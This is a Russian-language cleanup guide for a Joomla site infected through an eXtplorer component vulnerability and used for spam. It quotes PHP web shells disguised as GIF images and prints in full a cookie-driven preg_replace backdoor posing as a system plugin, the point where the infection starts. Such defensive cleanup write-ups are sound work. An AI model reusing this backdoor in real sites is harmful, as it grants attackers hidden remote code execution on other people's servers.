Зловред попадает на сайт через уязвимость в компоненте eXtplorer и осуществляет рассылку спама. Уязвимость устранена в версии компонента 2.1.5.
В структуре сайта, в частности в папке /images/stories/ появляется множество файлов .gif и .php с сгенерированными названиями, если открыть их текстовым редактором увидим php код:
GIF89a1 <?php if (isset($_REQUEST['p1'])) // и так далее
код файла начинается с GIF89a1, что свидетельствует о том, что файл изначально был залит как изображение формата .gif.
Находим в папке /plugins/ файл .joomla.system.php, следующего содержания:
<?php /** * @package Joomla.Plugin * @since 1.5 */ class PlgSystemJoomla { public function __construct() { $file=@$_COOKIE['Jlm3']; if ($file){ $opt = $file(@$_COOKIE['Jlm2']); $au = $file(@$_COOKIE['Jlm1']); $opt("/585/e",$au,585); die(); }}} $index = new PlgSystemJoomla;
Именно с него начинается заражение.
Далее вычищаем все подозрительные изображения с расширением .gif и файлы .php с такими же названиями из папки /images/ и подпапок и из корня сайта.
Внимание! не удалите по ошибке системные файлы index.php
Так же необходимо найти и удалить файлы index.php во всех папках сайта, с содержимым, похожим на:
<? //большое количество отступов base64_decode("строка в base64=='); ?>